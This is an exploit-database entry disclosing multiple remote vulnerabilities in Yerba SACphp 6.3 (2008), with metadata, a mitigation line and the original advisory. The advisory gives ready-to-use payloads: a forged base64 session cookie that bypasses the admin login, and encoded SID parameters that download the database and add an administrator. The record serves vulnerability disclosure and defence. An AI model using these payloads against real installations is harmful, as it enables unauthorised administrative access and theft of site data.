Yerba SACphp - exploit.company

vendor:

SACphp

by:

StAkeR

7.5

CVSS

HIGH

Admin Login ByPass, Privilege Escalation, Arbitrary Database Download, Arbitrary Add Admin

N/A

CWE

Product Name: SACphp

Affected Version From: 6.3

Affected Version To: 6.3

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

Yerba SACphp <= 6.3 Multiple Remote Vulnerabilities

Yerba SACphp <= 6.3 is vulnerable to multiple remote vulnerabilities. An attacker can bypass the admin login, escalate privileges, download arbitrary databases and add arbitrary admins.

Mitigation:

Upgrade to the latest version of Yerba SACphp

Source

Exploit-DB raw data:

 [*]~======================================================~[*] 
 [*]   Yerba SACphp <= 6.3 Multiple Remote Vulnerabilities  [*]
 [*]~======================================================~[*]
 
 [?] Discovered By StAkeR - StAkeR[at]hotmail[dot]it
 [?] Discovered On 07/10/2008
 [?] http://downloads.sourceforge.net/yerba/SACphp-6_28.tgz?modtime=1025222400&big_mirror=0

 [?] Admin Login ByPass
 [?] javascript:document.cookie="galleta[sesion]=MToxOkFkbWluaXN0cmFkb3IgZGVsIFNpc3RlbWE6Jw=="

 [?] Privilege Escalation 
 [?] index.php?SID=[path (base64 encoded)]

 [?] Arbitrary Database Download
 [?] index.php?SID=Jm9kbGFwc2VyPXhmJmFtZXRzaXM9cG9tJm5pbWRBQkR5PWRvbQ==

 [?] Arbitrary Add Admin 
 [?] index.php?SID=JnJhZ2VyZ2E9eGYmYW1ldHNpcz1wb20mc29pcmF1c1V5PWRvbQ==

# milw0rm.com [2008-10-07]